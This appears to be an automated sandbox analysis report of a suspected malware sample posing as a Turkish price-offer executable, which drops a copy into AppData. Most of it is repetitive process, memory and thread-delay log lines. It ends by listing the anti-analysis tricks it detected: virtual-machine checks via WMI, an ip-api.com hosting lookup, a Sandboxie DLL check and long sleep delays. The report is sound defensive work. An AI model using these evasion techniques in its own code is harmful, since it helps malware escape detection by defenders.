Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: F#U0130YAT TEKL#U0130F#U0130-2400.exe PID: 6596, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cYDnGbgU.exe PID: 2836, type: MEMORYSTR

Check if machine is in data center or colocation facility

Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1756426531.00000000042A6000.00000004.00000800.00020000.00000000.sdmp, F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1756426531.0000000003981000.00000004.00000800.00020000.00000000.sdmp, F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000008.00000002.4148813369.0000000002884000.00000004.00000800.00020000.00000000.sdmp, cYDnGbgU.exe, 00000009.00000002.1796054239.0000000004292000.00000004.00000800.00020000.00000000.sdmp, cYDnGbgU.exe, 0000000D.00000002.4145299206.0000000000435000.00000040.00000400.00020000.00000000.sdmp, cYDnGbgU.exe, 0000000D.00000002.4149137493.0000000003375000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Memory allocated: A00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Memory allocated: 2640000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Memory allocated: 4640000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Memory allocated: 8930000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Memory allocated: 7350000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Memory allocated: 8930000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Memory allocated: E80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Memory allocated: 2820000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Memory allocated: E80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Memory allocated: 2D60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Memory allocated: 2F50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Memory allocated: 2D60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Memory allocated: 8B60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Memory allocated: 9B60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Memory allocated: 8B60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Memory allocated: 18E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Memory allocated: 3310000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Memory allocated: 3150000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 599668	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 599211	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 599032	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 598875	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 598749	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 598640	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 598531	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 598416	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 598309	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 599874
